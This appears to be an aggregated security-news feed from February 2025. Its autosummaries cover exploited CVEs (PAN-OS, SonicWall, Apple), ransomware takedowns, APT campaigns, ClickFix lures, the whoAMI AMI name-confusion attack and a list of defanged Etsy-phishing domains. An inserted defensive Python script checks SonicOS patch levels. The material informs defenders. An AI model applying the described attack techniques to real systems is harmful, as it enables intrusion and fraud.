    exploits
    2025-02-14 https://www.bleepingcomputer.com/news/security/hackers-exploit-authentication-bypass-in-palo-alto-networks-pan-os/
    Hackers are launching attacks against Palo Alto Networks PAN-OS firewalls by exploiting a recently fixed vulnerability (CVE-2025-0108) that allows bypassing authentication. [...] "

    Autosummary: "


    New “whoAMI” Attack Exploits AWS AMI Name Confusion for Remote Code Execution

    exploits
    2025-02-14 https://thehackernews.com/2025/02/new-whoami-attack-exploits-aws-ami-name.html
    Cybersecurity researchers have disclosed a new type of name confusion attack called whoAMI that allows anyone who publishes an Amazon Machine Image (AMI) with a specific name to gain code execution within the Amazon Web Services (AWS) account. "If executed at scale, this attack could be used to gain access to thousands of accounts," Datadog Security Labs researcher Seth Art said in a report "

    Autosummary: Put differently, the name confusion attack requires the following three conditions to be met when a victim retrieves the AMI ID through the API: use of the name filter; a failure to specify either the owner, owner-alias, or owner-id parameters; and fetching the most recently created image from the returned list of matching images ("most_recent=true"). This leads to a scenario where an attacker can create a malicious AMI with a name that matches the pattern specified in the search criteria, resulting in the creation of an EC2 instance using the threat actor's doppelgänger AMI. "


    U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog

    exploits
    2025-02-14 https://securityaffairs.com/174233/hacking/u-s-cisa-adds-simplehelp-flaw-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds SimpleHelp vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a SimpleHelp vulnerability, tracked as CVE-2024-57727, to its Known Exploited Vulnerabilities (KEV) catalog. At the end of January, Horizon3 researchers discovered three vulnerabilities, tracked as CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728, that could be used […] "

    Autosummary: At the end of January, Horizon3 researchers discovered three vulnerabilities, tracked as CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728, that could be used to compromise a SimpleHelp server, as well as client machines being managed by SimpleHelp. "


    China-linked APT Salt Typhoon breached telecoms by exploiting Cisco router flaws

    exploits Telcos
    2025-02-14 https://securityaffairs.com/174226/apt/salt-typhoon-exploited-cisco-ios-xe-flaws.html
    China-linked APT Salt Typhoon has breached more U.S. telecommunications providers via unpatched Cisco IOS XE network devices. China-linked APT group Salt Typhoon is still targeting telecommunications providers worldwide, and according to a new report published by Recorded Future’s Insikt Group, the threat actors have breached more U.S. telecommunications providers by exploiting unpatched Cisco IOS XE […] "

    Autosummary: China-linked APT Salt Typhoon breached telecoms by exploiting Cisco router flaws (Pierluigi Paganini, February 14, 2025). China-linked APT Salt Typhoon has breached more U.S. telecommunications providers via unpatched Cisco IOS XE network devices. “The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI), Australian Signals Directorate’s (ASD’s) "


    Peruvian police in capybara gear make Valentine's drug bust

    latam
    2025-02-14 https://www.bbc.com/news/videos/cjr8wexly4xo
    Video shows the moment police use fancy dress to carry out a drug raid in Lima, Peru. "

    Autosummary: "


    PirateFi game on Steam caught installing password-stealing malware

    exploits
    2025-02-14 https://www.bleepingcomputer.com/news/security/piratefi-game-on-steam-caught-installing-password-stealing-malware/
    A free-to-play game named PirateFi in the Steam store has been distributing the Vidar infostealing malware to unsuspecting users. [...] "

    Autosummary: "If you are one of the players who downloaded this "game": Consider the credentials, session cookies and secrets saved in your browser, email client, cryptocurrency wallets etc. compromised," advises SECUINFRA. "


    Erasing Escobar: Will Colombia ban the sale of memorabilia of the drug lord?

    latam
    2025-02-13 https://www.bbc.com/news/articles/cednp178dwdo
    Politicians in the country want to prohibit the sale of such items, but they face opposition. "

    Autosummary: "We have a right to work, and these Pablo T-shirts especially always sell well," says Joana Montoya, who owns a stall stocked full of Escobar merchandise in Comuna 13, a popular tourist zone of Medellín. "Difficult issues that are part of the history and memory of our country cannot simply be remembered by a T-shirt, or a sticker sold on a street corner," says Juan Sebastián Gómez, Congress member and co-author of the bill. "It helps us pay our rent, buy food, look after our kids," says Ms Montoya, who supports herself and her young daughter. "


    FINALDRAFT Malware Exploits Microsoft Graph API for Espionage on Windows and Linux

    exploits Linux
    2025-02-13 https://thehackernews.com/2025/02/finaldraft-malware-exploits-microsoft.html
    Threat hunters have shed light on a new campaign targeting the foreign ministry of an unnamed South American nation with bespoke malware capable of granting remote access to infected hosts. The activity, detected in November 2024, has been attributed by Elastic Security Labs to a threat cluster it tracks as REF7707. Some of the other targets include a telecommunications entity and a university, "

    Autosummary: "While the REF7707 campaign is characterized by a well-engineered, highly capable, novel intrusion set, the campaign owners exhibited poor campaign management and inconsistent evasion practices," security researchers Andrew Pease and Seth Goodwin said in a technical analysis. "


    Sarcoma ransomware gang claims the theft of sensitive data from PCB maker Unimicron

    exploits ransomware
    2025-02-13 https://securityaffairs.com/174159/cyber-crime/sarcoma-ransomware-claims-the-theft-of-sensitive-data-from-pcb-maker-unimicron.html
    The Sarcoma ransomware group announced a breach of the Taiwanese printed circuit board (PCB) manufacturing giant Unimicron. The Sarcoma ransomware group claims to have breached Taiwanese PCB manufacturer Unimicron, leaked sample files, and threatened a full data release if no ransom is paid by Tuesday, February 20, 2025. Unimicron Technology Corporation is a Taiwanese company […] "

    Autosummary: "


    RA World Ransomware Attack in South Asia Links to Chinese Espionage Toolset

    exploits ransomware
    2025-02-13 https://thehackernews.com/2025/02/hackers-exploited-pan-os-flaw-to-deploy.html
    An RA World ransomware attack in November 2024 targeting an unnamed Asian software and services company involved the use of a malicious tool exclusively used by China-based cyber espionage groups, raising the possibility that the threat actor may be moonlighting as a ransomware player in an individual capacity. "During the attack in late 2024, the attacker deployed a distinct toolset that had "

    Autosummary: The attacks took place between December 4, 2024, and January 23, 2025, Recorded Future's Insikt Group said, adding the adversary, also tracked as Earth Estries, FamousSparrow, GhostEmperor, RedMike, and UNC2286, attempted to exploit more than 1,000 Cisco devices globally during the timeframe. "


    Palo Alto Networks Patches Authentication Bypass Exploit in PAN-OS Software

    exploits
    2025-02-13 https://thehackernews.com/2025/02/palo-alto-networks-patches.html
    Palo Alto Networks has addressed a high-severity security flaw in its PAN-OS software that could result in an authentication bypass. The vulnerability, tracked as CVE-2025-0108, carries a CVSS score of 7.8 out of 10.0. The score, however, drops to 5.1 if access to the management interface is restricted to a jump box. "An authentication bypass in the Palo Alto Networks PAN-OS software enables an "

    Autosummary: "


    Chinese espionage tools deployed in RA World ransomware attack

    exploits ransomware
    2025-02-13 https://www.bleepingcomputer.com/news/security/chinese-espionage-tools-deployed-in-ra-world-ransomware-attack/
    A China-based threat actor, tracked as Emperor Dragonfly and commonly associated with cybercriminal endeavors, has been observed using a toolset previously attributed to espionage actors in a ransomware attack. [...] "

    Autosummary: “During the attack in late 2024, the attacker deployed a distinct toolset that had previously been used by a China-linked actor in classic espionage attacks,” the researchers say, adding that “tools associated with China-based espionage groups are often shared resources” but “many aren’t publicly available and aren’t usually associated with cybercrime activity.” "


    US Coast Guard told to improve its cybersecurity, after warning raised that hacked ports could cost $2 billion per day

    ciber
    2025-02-13 https://www.tripwire.com/state-of-security/us-coast-guard-urged-strengthen-cybersecurity-amid-2b-daily-port-risk
    The US Coast Guard has been urged to improve the cybersecurity infrastructure of the Maritime Transportation System (MTS), which includes ports, waterways, and vessels essential for transporting over $5.4 trillion worth of goods annually. Read more in my article on the Tripwire State of Security blog. "

    Autosummary: If port operations were to shut down due to a successful cyber attack, the impact to the local economy "could reach $2 billion per day", Long Beach Port CEO Mario Cordero told CBS News this week, as it investigated the threat of Chinese-manufactured ship-to-shore cranes being vulnerable to hackers. "


    North Korean hackers spotted using ClickFix tactic to deliver malware

    exploits
    2025-02-13 https://www.helpnetsecurity.com/2025/02/13/north-korean-hackers-spotted-using-clickfix-tactic-to-deliver-malware/

    North Korean state-sponsored group Kimsuky (aka Emerald Sleet, aka VELVET CHOLLIMA) is attempting to deliver malware to South Korean targets by leveraging the so-called “ClickFix” tactic. A relatively new tactic: the ClickFix social engineering tactic has been dubbed thus because of the initial pretext used by malware peddlers: the users, wanting to read a webpage or document or join a video call, are shown a fake browser notice saying that the page or doc cannot … More

    The post North Korean hackers spotted using ClickFix tactic to deliver malware appeared first on Help Net Security.

    "

    Autosummary: "


    North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks

    ciber
    2025-02-13 https://thehackernews.com/2025/02/north-korean-apt43-uses-powershell-and.html
    A nation-state threat actor with ties to North Korea has been linked to an ongoing campaign targeting South Korean business, government, and cryptocurrency sectors. The attack campaign, dubbed DEEP#DRIVE by Securonix, has been attributed to a hacking group known as Kimsuky, which is also tracked under the names APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet "

    Autosummary: The attack campaign, dubbed DEEP#DRIVE by Securonix, has been attributed to a hacking group known as Kimsuky, which is also tracked under the names APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet Chollima. "


    China-linked APTs’ tool employed in RA World Ransomware attack

    exploits ransomware
    2025-02-13 https://securityaffairs.com/174189/apt/ra-world-ransomware-attack-china-apt-possible-link.html
    A November 2024 RA World ransomware attack on an Asian software firm used a tool linked to China-linked threat actors. Broadcom researchers reported that threat actors behind an RA World ransomware attack against an Asian software and services firm employed a tool that was exclusively associated in the past with China-linked APT groups. “Tools that […] "

    Autosummary: China-linked APTs’ tool employed in RA World Ransomware attack (Pierluigi Paganini, February 13, 2025). A November 2024 RA World ransomware attack on an Asian software firm used a tool linked to China-linked threat actors. "


    How AI was used in an advanced phishing campaign targeting Gmail users

    financial
    2025-02-13 https://www.malwarebytes.com/blog/news/2025/02/how-ai-was-used-in-an-advanced-phishing-campaign-targeting-gmail-users
    Scammers are once again using AI to take over Gmail accounts. "

    Autosummary: Use multi-factor authentication (MFA) for all accounts; protect your devices with up-to-date security software (such as Malwarebytes Premium Security); and use text protection and text message filtering on your mobile device. At the time, FBI Special Agent in Charge Robert Tripp said: “Attackers are leveraging AI to craft highly convincing voice or video messages and emails to enable fraud schemes against individuals and businesses alike. "


    U.S. CISA adds Microsoft Windows, Zyxel device flaws to its Known Exploited Vulnerabilities catalog

    exploits
    2025-02-12 https://securityaffairs.com/174135/security/u-s-cisa-adds-microsoft-windows-zyxel-device-flaws-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Windows, Zyxel device flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: The vulnerability CVE-2024-40891 is a command injection issue in Zyxel CPE Series devices that remains unpatched and has not yet […] "

    Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-40891 (Zyxel DSL CPE OS Command Injection Vulnerability); CVE-2024-40890 (Zyxel DSL CPE OS Command Injection Vulnerability); CVE-2025-21418 (Microsoft Windows "


    Microsoft Patch Tuesday security updates for February 2025 fixed 2 actively exploited bugs

    exploits
    2025-02-12 https://securityaffairs.com/174126/hacking/microsoft-patch-tuesday-security-updates-february-2025.html
    Microsoft Patch Tuesday security updates for February 2025 addressed four zero-day flaws, two of which are actively exploited in the wild. Microsoft Patch Tuesday security updates for February 2025 addressed 57 vulnerabilities in Windows and Windows Components, Office and Office Components, Azure, Visual Studio, and Remote Desktop Services. Two of these vulnerabilities are listed as […] "

    Autosummary: Microsoft Patch Tuesday security updates for February 2025 fixed 2 actively exploited bugs (Pierluigi Paganini, February 12, 2025). Microsoft Patch Tuesday security updates for February 2025 addressed four zero-day flaws, two of which are actively exploited in the wild. "


    Elon Musk denies "hostile takeover" of government in surprise White House appearance

    government
    2025-02-12 https://www.bbc.com/news/articles/cp820y16xvlo
    The world's richest man took questions for the first time since he was appointed to lead a sweeping government cost-cutting effort. "

    Autosummary: The billionaire technology entrepreneur, who himself was appointed and not elected, described federal workers as an "unelected, fourth, unconstitutional branch of government" that he said has "more power than any elected representative". "


    Fake Etsy invoice scam tricks sellers into sharing credit card information

    financial
    2025-02-12 https://www.malwarebytes.com/blog/news/2025/02/fake-etsy-invoice-scam-tricks-sellers-into-sharing-credit-card-information
    Etsy sellers are being targeted by scammers that use a legitimate Etsy domain to host their dodgy PDFs. "

    Autosummary: com-etsy-verify[.]cfd, etsy-car[.]switchero[.]cfd, etsy[.]1562587027[.]cfd, etsy[.]3841246[.]cfd, etsy[.]39849329[.]cfd, etsy[.]447385638[.]cfd, etsy[.]57434[.]cfd, etsy[.]5847325245[.]cfd, etsy[.]6562587027[.]cfd, etsy[.]6841246[.]cfd, etsy[.]72871[.]cfd, etsy[.]7562587027[.]cfd, etsy[.]8841246[.]cfd, etsy[.]92875[.]cfd, etsy[.]9438632572[.]cfd, etsy[.]948292[.]cfd, etsy[.]97434[.]cfd, etsy[.]984323[.]cfd, etsy[.]checkid1573[.]cfd, etsy[.]chekup-out[.]cfd, etsy[.]coinbox[.]cfd, etsy[.]fastpay[.]cfd, etsy[.]offer584732[.]cfd, etsy[.]offer62785[.]cfd, etsy[.]offer684732[.]cfd, etsy[.]paylink[.]cfd, etsy[.]paymint[.]cfd, etsy[.]paywave[.]cfd, etsy[.]requlred-verlfication[.]cfd, etsy[.]requstlon-verflcation[.]cfd, etsy[.]web-proff-point[.]cfd, verlflcation-etsy[.]cfd. Despite this, there are still some red flags to look for: the email uses language like “Dear Seller” or “Hello Etsy Member”, instead of addressing you by your Etsy shop name or username; the sender’s email address doesn’t end in @etsy.com, or has suspicious variations (extra numbers or letters) "


    North Korean Hackers Exploit PowerShell Trick to Hijack Devices in New Cyberattack

    exploits ciber
    2025-02-12 https://thehackernews.com/2025/02/north-korean-hackers-exploit-powershell.html
    The North Korea-linked threat actor known as Kimsuky has been observed using a new tactic that involves deceiving targets into running PowerShell as an administrator and then instructing them to paste and run malicious code provided by them. "To execute this tactic, the threat actor masquerades as a South Korean government official and over time builds rapport with a target before sending a "

    Autosummary: "Chapman, an American citizen, conspired with overseas IT workers from October 2020 to October 2023 to steal the identities of U.S. nationals and used those identities to apply for remote IT jobs and, in furtherance of the scheme, transmitted false documents to the Department of Homeland Security," the DoJ said. "


    Microsoft’s Patch Tuesday Fixes 63 Flaws, Including Two Under Active Exploitation

    exploits
    2025-02-12 https://thehackernews.com/2025/02/microsofts-patch-tuesday-fixes-63-flaws.html
    Microsoft on Tuesday released fixes for 63 security flaws impacting its software products, including two vulnerabilities that it said have come under active exploitation in the wild. Of the 63 vulnerabilities, three are rated Critical, 57 are rated Important, one is rated Moderate, and two are rated Low in severity. This is aside from the 23 flaws Microsoft addressed in its Chromium-based Edge "

    Autosummary: The update is notable for fixing two actively exploited flaws: CVE-2025-21391 (CVSS score: 7.1), Windows Storage Elevation of Privilege Vulnerability; and CVE-2025-21418 (CVSS score: 7.8), Windows "


    BadPilot network hacking campaign fuels Russian SandWorm attacks

    rusia-ucrania
    2025-02-12 https://www.bleepingcomputer.com/news/security/badpilot-network-hacking-campaign-fuels-russian-sandworm-attacks/
    A subgroup of the Russian state-sponsored hacking group APT44, also known as "Seashell Blizzard" and "Sandworm", has been targeting critical organizations and governments in a multi-year campaign dubbed "BadPilot." [...] "

    Autosummary: Microsoft has observed network scans and subsequent exploitation attempts of the following vulnerabilities: CVE-2021-34473 (Microsoft Exchange), CVE-2022-41352 (Zimbra Collaboration Suite), CVE-2023-32315 (OpenFire), CVE-2023-42793 (JetBrains TeamCity), CVE-2023-23397 (Microsoft Outlook), CVE-2024-1709 (ConnectWise ScreenConnect), and CVE-2023-48788 (Fortinet FortiClient EMS). After exploiting the above vulnerabilities to obtain access, the hackers established persistence by deploying custom web shells like "LocalOlive". "


    Researchers Find New Exploit Bypassing Patched NVIDIA Container Toolkit Vulnerability

    exploits
    2025-02-12 https://thehackernews.com/2025/02/researchers-find-new-exploit-bypassing.html
    Cybersecurity researchers have discovered a bypass for a now-patched security vulnerability in the NVIDIA Container Toolkit that could be exploited to break out of a container's isolation protections and gain complete access to the underlying host. The new vulnerability is being tracked as CVE-2025-23359 (CVSS score: 8.3). It affects the following versions - NVIDIA Container Toolkit (All "

    Autosummary: "


    Workers rescued from window ledge as fire engulfs Rio clothing factory

    industry
    2025-02-12 https://www.bbc.com/news/videos/c3rwe3yy89no
    At least 20 people have been injured after a factory making costumes for Carnival celebrations in Brazil caught fire. "

    Autosummary: "


    Sarcoma ransomware claims breach at giant PCB maker Unimicron

    exploits ransomware
    2025-02-12 https://www.bleepingcomputer.com/news/security/sarcoma-ransomware-claims-breach-at-giant-pcb-maker-unimicron/
    A relatively new ransomware operation named "Sarcoma" has claimed responsibility for an attack against the Unimicron printed circuit boards (PCB) maker in Taiwan. [...] "

    Autosummary: [Image: Unimicron added to Sarcoma's list of victims (Source: BleepingComputer)] Unimicron is a public company manufacturing rigid and flexible PCBs, high-density interconnection (HDI) boards, and integrated circuit (IC) carriers. "


    Russian cybercriminal Alexander Vinnik is being released from U.S. custody in exchange for Marc Fogel

    rusia-ucrania ciber
    2025-02-12 https://securityaffairs.com/174148/cyber-crime/russian-cybercriminal-alexander-vinnik-is-being-released-from-u-s.html
    Russian cybercriminal Alexander Vinnik is being released from U.S. custody in exchange for Marc Fogel, a Trump administration source told CNN. The New York Times first reported that Alexander Vinnik, a Russian money laundering suspect, is being released from U.S. custody in exchange for Marc Fogel, according to a Trump administration source. Alexander Vinnik, a […] "

    Autosummary: The virtual currency exchange received criminal proceeds from various illegal activities, including computer intrusions, ransomware attacks, identity theft, corruption, and drug distribution. Subsequently, Vinnik returned to Greece before being extradited to the U.S. “Today’s result shows how the Justice Department, working with international partners, reaches across the globe to combat cryptocrime,” said Deputy Attorney General Lisa Monaco. "


    Surge in attacks exploiting old ThinkPHP and ownCloud flaws

    exploits
    2025-02-12 https://www.bleepingcomputer.com/news/security/surge-in-attacks-exploiting-old-thinkphp-and-owncloud-flaws/
    Increased hacker activity has been observed in attempts to compromise poorly maintained devices that are vulnerable to older security issues from 2022 and 2023. [...] "

    Autosummary: Daily exploitation activity (Source: GreyNoise). The second vulnerability affects the popular open-source file-sharing software and arises from the app's dependency on a third-party library that exposes PHP environment details through a URL. "


    What is penetration testing? | Unlocked 403 cybersecurity podcast (ep. 10)

    ciber
    2025-02-12 https://www.welivesecurity.com/en/videos/what-is-penetration-testing-unlocked-403-cybersecurity-podcast-ep-10/
    Ever wondered what it's like to hack for a living – legally? Learn about the art and thrill of ethical hacking and how white-hat hackers help organizations tighten up their security. "

    Autosummary: "


    Arvest Bank CISO on building a strong cybersecurity culture in banking

    financial ciber
    2025-02-11 https://www.helpnetsecurity.com/2025/02/11/mike-calvi-arvest-bank-banking-cybersecurity/

    In this Help Net Security interview, Mike Calvi, CISO at Arvest Bank, discusses building a strong cybersecurity culture within the banking sector. He explains how leadership, effective reporting, and proactive engagement with associates are key in strengthening security. Calvi also touches on how banks can measure success and balance accountability while fostering a collaborative environment.

    The post Arvest Bank CISO on building a strong cybersecurity culture in banking appeared first on Help Net Security.

    "

    Autosummary: Based on their chosen topic, such as cybersecurity, social engineering, fraud, money laundering, physical security, etc., the reporting mechanism auto-routes the submission to the correct team. Additionally, our human risk management (HRM) team does a great job keeping cybersecurity front and center with the associates through internal news articles, intranet banners, and internal chat spaces for cybersecurity collaboration. The awareness, shared by all associates in the bank, that protecting the organization is everyone’s responsibility, not just the Security and IT teams, is becoming the norm. "


    Cybersecurity jobs available right now: February 11, 2025

    ciber
    2025-02-11 https://www.helpnetsecurity.com/2025/02/11/cybersecurity-jobs-available-right-now-february-11-2025/

    Application Offensive Security Consultant Sharp Decisions | USA | On-site – View job details As an Application Offensive Security Consultant, you will perform Offensive Security Testing against applications and APIs. Perform application threat hunting to evaluate risk to applications. Perform manual security testing of applications. Provide the vulnerability information in the predefined report format after performing the testing using manual methodology and tools. Automotive Cybersecurity Assessor / Engineer UL Solutions | South Korea | On-site … More

    The post Cybersecurity jobs available right now: February 11, 2025 appeared first on Help Net Security.

    "

    Autosummary: Space Segment Security Engineer EUMETSAT | Germany | On-site – View job details As a Space Segment Security Engineer, you will perform routine operations related to spacecraft security, including management, access control and operational use of satellite authentication and encryption keys, and related facilities, across multiple sites and in close cooperation with the spacecraft operations and mission control systems teams. Senior Director of Security, CISO Hiive | Canada | Hybrid – View job details As a Senior Director of Security, CISO, you will define and drive Hiive’s global security vision, aligning security initiatives with business objectives, and ensuring that security is a key enabler for company growth and innovation. Security Engineer Allego | European Union | Remote – View job details As a Security Engineer, you will be responsible for designing and updating the overall cybersecurity strategy, managing security improvement projects, overseeing security testing strategies such as vulnerability scanning and penetration testing, and performing regular threat analysis to stay up-to-date with the current security landscape. "


    Apple Patches Actively Exploited iOS Zero-Day CVE-2025-24200 in Emergency Update

    exploits
    2025-02-11 https://thehackernews.com/2025/02/apple-patches-actively-exploited-ios.html
    Apple on Monday released out-of-band security updates to address a security flaw in iOS and iPadOS that it said has been exploited in the wild. Assigned the CVE identifier CVE-2025-24200, the vulnerability has been described as an authorization issue that could make it possible for a malicious actor to disable USB Restricted Mode on a locked device as part of a cyber physical attack. This "

    Autosummary: "


    Threat Actors Exploit ClickFix to Deploy NetSupport RAT in Latest Cyber Attacks

    exploits
    2025-02-11 https://thehackernews.com/2025/02/threat-actors-exploit-clickfix-to.html
    Threat actors have been observed using the increasingly common ClickFix technique to deliver a remote access trojan named NetSupport RAT since early January 2025. NetSupport RAT, typically propagated via bogus websites and fake browser updates, grants attackers full control over the victim's host, allowing them to monitor the device's screen in real-time, control the keyboard and mouse, upload and download "

    Autosummary: "


    8Base Ransomware Data Leak Sites Seized in International Law Enforcement Operation

    exploits ransomware
    2025-02-11 https://thehackernews.com/2025/02/8base-ransomware-data-leak-sites-seized.html
    A coordinated law enforcement operation has taken down the dark web data leak and negotiation sites associated with the 8Base ransomware gang. Visitors to the data leak site are now greeted with a seizure banner that says: "This hidden site and the criminal content have been seized by the Bavarian State Criminal Police Office on behalf of the Office of the Public Prosecutor "

    Autosummary: "


    Operation Phobos Aetor: Police dismantled 8Base ransomware gang

    exploits ransomware
    2025-02-11 https://securityaffairs.com/174078/cyber-crime/police-dismantled-8base-ransomware-gang.html
    Authorities dismantled the 8Base ransomware gang, shutting down its dark web data leak and negotiation sites. An international law enforcement operation, codenamed Operation Phobos Aetor, dismantled the 8Base ransomware gang. The police took down the dark web data leak and negotiation sites. The police have yet to disclose the names of the suspects. Authorities replaced […] "

    Autosummary: The 8Base ransomware group has been active since March 2022 and focused on small and medium-size businesses in multiple industries, including finance, manufacturing, business services, and IT. "


    8Base ransomware group leaders arrested, leak site seized

    exploits ransomware
    2025-02-11 https://www.helpnetsecurity.com/2025/02/11/8base-ransomware-group-leaders-arrested-leak-site-seized-phobos/

    The Thai police have arrested four individuals suspected of being the leaders of the 8Base ransomware group and of stealing approximately $16 million from 1,000+ victims they targeted with the Phobos ransomware. “Officers from Cyber Crime Investigation Bureau, led by Police Lieutenant General Trairong Phiwphan, conducted ‘Operation PHOBOS AETOR’ in Phuket on February 10, arresting four foreign hackers involved in ransomware attacks. The operation, coordinated with Immigration Police and Region 8 Police, raided four locations … More

    The post 8Base ransomware group leaders arrested, leak site seized appeared first on Help Net Security.

    "

    Autosummary: Still, 8Base group claimed several victims in December 2024, including the Croatian port operating company Luka Rijeka, Canadian company Mint Pharmaceuticals, and Japanese manufacturing company Iseki Agricultural Machinery. "


    Industrial Defender 8.0 offers detailed view of OT environments

    industry
    2025-02-11 https://www.helpnetsecurity.com/2025/02/11/industrial-defender-8-0-offers-detailed-view-of-ot-environments/

    Industrial Defender announced its latest platform, Industrial Defender 8.0. This release introduces a completely redesigned risk dashboard, helping critical infrastructure and industrial operators manage security and compliance risks by assessing and prioritizing them with enhanced intelligence and risk scoring. Industrial Defender 8.0 also includes updates to Industrial Defender’s robust policy library, for meeting the very latest in standards and frameworks such as NERC CIP, AESCSF, OTCC, TSA Security Directives, and more. Industrial Defender’s 8.0 platform … More

    The post Industrial Defender 8.0 offers detailed view of OT environments appeared first on Help Net Security.

    "

    Autosummary: ISA/IEC 62443 (International Society of Automation/International Electrotechnical Commission); NIS2 Directive (Network and Information Systems Security Directive); NIST CSF (National Institute of Standards and Technology Cybersecurity Framework); Saudi Arabia’s NCA OTCC (Operational Technology Cybersecurity Compliance) "


    Apple fixes zero-day flaw exploited in “extremely sophisticated” attack (CVE-2025-24200)

    exploits
    2025-02-11 https://www.helpnetsecurity.com/2025/02/11/apple-fixes-zero-day-flaw-exploited-in-extremely-sophisticated-attack-cve-2025-24200/

    Users of iPhones and iPads that run iOS/iPadOS 18 and iPadOS 17 are urged to implement the latest updates to plug a security feature bypass vulnerability (CVE-2025-24200) exploited in the wild in “an extremely sophisticated” attack. The vulnerability (CVE-2025-24200) “A physical attack may disable USB Restricted Mode on a locked device,” Apple explained. USB Restricted Mode is a feature Apple introduced in 2018 to protect users against device unlocking (“cracking”) tools such as

    The post Apple fixes zero-day flaw exploited in “extremely sophisticated” attack (CVE-2025-24200) appeared first on Help Net Security.

    "

    Autosummary: "


    Russian military hackers deploy malicious Windows activators in Ukraine

    rusia-ucrania
    2025-02-11 https://www.bleepingcomputer.com/news/security/russian-military-hackers-deploy-malicious-windows-activators-in-ukraine/
    The Sandworm Russian military cyber-espionage group is targeting Windows users in Ukraine with trojanized Microsoft Key Management Service (KMS) activators and fake Windows updates. [...] "

    Autosummary: "


    SonicWall firewall exploit lets hackers hijack VPN sessions, patch now

    exploits
    2025-02-11 https://www.bleepingcomputer.com/news/security/sonicwall-firewall-exploit-lets-hackers-hijack-vpn-sessions-patch-now/
    Security researchers at Bishop Fox have published complete exploitation details for the CVE-2024-53704 vulnerability that allows bypassing the authentication mechanism in certain versions of the SonicOS SSLVPN application. [...] "

    Autosummary: Fixes were made available in SonicOS 8.0.0-8037 and later, 7.0.1-5165 and higher, 7.1.3-7015 and higher, and 6.5.5.1-6n and higher. "
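The autosummary above names the SonicOS builds that carry the fix for CVE-2024-53704. The Python below is an added example, not code from BleepingComputer, Bishop Fox or SonicWall, that turns those fixed builds into a triage check over a firmware inventory. It parses SonicOS version strings of the form `release-build` (the letter suffix in `6.5.5.1-6n` included), identifies the release train by the first two dotted components (an assumption about how the branches line up), and reports whether each device is at or above the fixed build for its train. Versions on trains the excerpt does not mention come back as `unknown` rather than `fixed`; confirm those, and the exact affected range, against the vendor advisory. The inventory is constructed sample data.

```python
import re
from typing import Dict, NamedTuple, Tuple

# Fixed builds named in the excerpt above, keyed by release train
# (first two dotted components). Any other train is reported as "unknown".
FIXED_BUILDS: Dict[str, str] = {
    "8.0": "8.0.0-8037",
    "7.0": "7.0.1-5165",
    "7.1": "7.1.3-7015",
    "6.5": "6.5.5.1-6n",
}

# release part, dash, numeric build, optional single letter suffix (e.g. "6n")
_VERSION_RE = re.compile(r"^(\d+(?:\.\d+)*)-(\d+)([a-z]?)$")


class SonicOSVersion(NamedTuple):
    release: Tuple[int, ...]  # dotted part, e.g. (7, 0, 1)
    build: int                # numeric build, e.g. 5165
    suffix: str               # letter suffix, "" when absent, "n" in 6.5.5.1-6n


def parse_version(text: str) -> SonicOSVersion:
    """Parse 'X.Y.Z-BUILD[letter]' into a comparable tuple; raise on anything else."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised SonicOS version string: {text!r}")
    release = tuple(int(p) for p in m.group(1).split("."))
    return SonicOSVersion(release, int(m.group(2)), m.group(3))


def train_of(v: SonicOSVersion) -> str:
    """Release train key, e.g. '7.0' for 7.0.1-5165 (assumed branch mapping)."""
    return ".".join(str(p) for p in v.release[:2])


def assess(text: str) -> str:
    """Return 'fixed', 'vulnerable' or 'unknown' for one firmware string."""
    v = parse_version(text)
    fixed_text = FIXED_BUILDS.get(train_of(v))
    if fixed_text is None:
        return "unknown"  # train not covered by the excerpt; check the advisory
    fixed = parse_version(fixed_text)
    # Tuple comparison: release components first, then build, then suffix,
    # so 6.5.5.1-6m sorts below 6.5.5.1-6n and 7.1.2-x below 7.1.3-7015.
    return "fixed" if v >= fixed else "vulnerable"


def triage(inventory: Dict[str, str]) -> Dict[str, str]:
    """Map each device name to its verdict; malformed strings become 'unknown'."""
    result = {}
    for name, version in inventory.items():
        try:
            result[name] = assess(version)
        except ValueError:
            result[name] = "unknown"
    return result


# Constructed sample inventory (hypothetical device names and versions).
SAMPLE_INVENTORY = {
    "edge-fw-01": "8.0.0-8035",
    "edge-fw-02": "7.0.1-5165",
    "branch-fw-1": "7.1.2-7019",
    "legacy-fw": "6.5.5.1-6m",
    "lab-fw": "5.9.2.14-12n",
}

if __name__ == "__main__":
    for dev, verdict in triage(SAMPLE_INVENTORY).items():
        print(f"{dev:12} {SAMPLE_INVENTORY[dev]:14} {verdict}")
```

Feed it the version column from a real inventory export; anything reported `vulnerable` should be patched or have its SSLVPN interface taken off the internet until it is, and anything `unknown` needs a manual look at the advisory.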


    US indicts 8Base ransomware operators for Phobos encryption attacks

    exploits ransomware
    2025-02-11 https://www.bleepingcomputer.com/news/security/us-indicts-8base-ransomware-operators-for-phobos-encryption-attacks/
    The U.S. Justice Department announced the names of two Phobos ransomware affiliates arrested yesterday in Thailand, charging them on 11 counts due to their involvement in more than a thousand cyberattacks. [...] "

    Autosummary: "


    US sanctions LockBit ransomware’s bulletproof hosting provider

    exploits ransomware
    2025-02-11 https://www.bleepingcomputer.com/news/security/us-sanctions-lockbit-ransomwares-bulletproof-hosting-provider/
    ​The United States, Australia, and the United Kingdom have sanctioned Zservers, a Russia-based bulletproof hosting (BPH) services provider, for supplying essential attack infrastructure for the LockBit ransomware gang. [...] "

